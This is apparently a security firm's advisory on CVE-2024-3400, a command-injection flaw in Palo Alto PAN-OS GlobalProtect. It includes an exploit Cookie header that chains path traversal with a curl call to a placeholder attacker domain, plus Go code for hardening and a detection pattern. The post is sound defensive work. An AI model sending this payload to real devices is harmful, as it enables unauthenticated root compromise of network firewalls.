Tue, Apr 23, 2024
Note: This vulnerability remains under active exploitation, and Kroll experts are investigating. If further details are uncovered by our team, updates will be made to the Kroll Cyber Risk blog.
A command injection vulnerability, tracked as CVE-2024-3400, was recently discovered in the GlobalProtect feature of Palo Alto Networks PAN-OS software. This vulnerability has a CVSS score of 10 (Critical) and is actively being exploited in the wild. It impacts PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1. If exploited on vulnerable PAN-OS versions with the affected feature configurations, an unauthenticated attacker could execute arbitrary code with root privileges on the firewall.
Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 have been developed and were released on April 14, 2024. Cloud NGFW, Panorama appliances and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.
Kroll is aware of increasing cases of exploitation of this vulnerability in the wild. Palo Alto customers who have not patched their GlobalProtect devices should assume compromise.
On April 16, watchTowr posted a technical breakdown and proof of concept (POC) for CVE-2024-3400, revealing how trivial this vulnerability is to exploit. The issue is caused by allowing an arbitrary file write via a path traversal string, combined with command injection, in the session ID value, which an attacker can control by editing the Cookie header of their request.
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/[arbitrarystring]`curl${IFS}attackerdomain.com`;
This creates an empty file in the “device_telemetry/hour” directory, which is processed hourly. Each hour the logging service acts on every entry in that directory and, because it fails to sanitize filenames, executes the command embedded in the filename. In the example above, that command makes a request to an attacker-controlled domain.
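The two ingredients described above, a session ID that escapes its directory and shell metacharacters inside a filename, are both checkable. The following Go code is an added example, not code from Palo Alto Networks, watchTowr or the Gorilla project: it shows a hardened way to derive a session file path from a cookie value (allowlist first, then a containment check) and a simple log-scanning check that flags SESSID cookies carrying traversal or shell metacharacters. The store directory, regex allowlist and log lines are constructed assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// Assumed allowlist: opaque token characters only. The vulnerable pattern
// described above builds a path straight from the cookie value instead.
var safeSessionID = regexp.MustCompile(`^[A-Za-z0-9_-]{16,128}$`)

// SessionFilePath is the hardened form: reject anything outside the allowlist,
// then verify the joined path still lies inside storeDir (defense in depth).
func SessionFilePath(storeDir, sessionID string) (string, error) {
	if !safeSessionID.MatchString(sessionID) {
		return "", errors.New("session id contains characters outside the allowlist")
	}
	base := filepath.Clean(storeDir)
	p := filepath.Join(base, "session_"+sessionID)
	if !strings.HasPrefix(p, base+string(filepath.Separator)) {
		return "", errors.New("session id escapes the store directory")
	}
	return p, nil
}

// Detection side: a SESSID value containing "../" or backtick/$/|/& is not a
// legitimate token and matches the exploitation pattern described above.
var suspiciousSessID = regexp.MustCompile(`SESSID=[^;\s]*(\.\./|[\x60$|&])`)

// SuspiciousSessionCookie reports whether a log line carries such a cookie.
func SuspiciousSessionCookie(line string) bool {
	return suspiciousSessID.MatchString(line)
}

func main() {
	// Constructed sample log lines (not real traffic); the second mirrors the
	// cookie shape shown above with a placeholder command.
	lines := []string{
		"GET /login Cookie: SESSID=2f3a9c1e4b7d8a6f0c1d2e3f4a5b6c7d",
		"GET /login Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/x`cmd`",
	}
	for _, l := range lines {
		fmt.Printf("suspicious=%v  %s\n", SuspiciousSessionCookie(l), l)
	}
}
```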
Kroll alerted clients to the threat on Friday, April 12, 2024. Since then, we have responded to suspected compromises surrounding this vulnerability. To address these concerns, our investigators have developed a standardized incident response approach. This includes:
Kroll has observed active, opportunistic exploitation of CVE-2024-3400 by numerous actors. Because the exploit is easy and a compromised firewall is perfectly positioned for further intrusion into a network, this vulnerability is a high-priority target for threat actors until the flaw is fixed.
Kroll observations show multiple methods of testing and exploring the vulnerability conducted from a highly geographically distributed range of IP addresses, which are being actively investigated and have been added to the Kroll IOC detection database. We do not see evidence of successful exploitation on patched devices.
Palo Alto provides CLI commands in their FAQ to identify indicators of attempted compromise.
Security researchers have identified that the path traversal exploit may be related to the open-source web framework “Gorilla”, which does not sanitize session IDs correctly; a fix has since been submitted to the repository. Kroll has not yet independently verified whether this is the case, but the Gorilla library is certainly vulnerable to path traversal. As of April 18, 2024, no CVE has been assigned. Gorilla is used by hundreds of other projects on GitHub and is likely part of many private codebases as well. Kroll is continuing to analyze the threat that this vulnerability could pose to other popular projects and products.
Below are some key recommendations from Kroll’s cyber threat intelligence (CTI) team: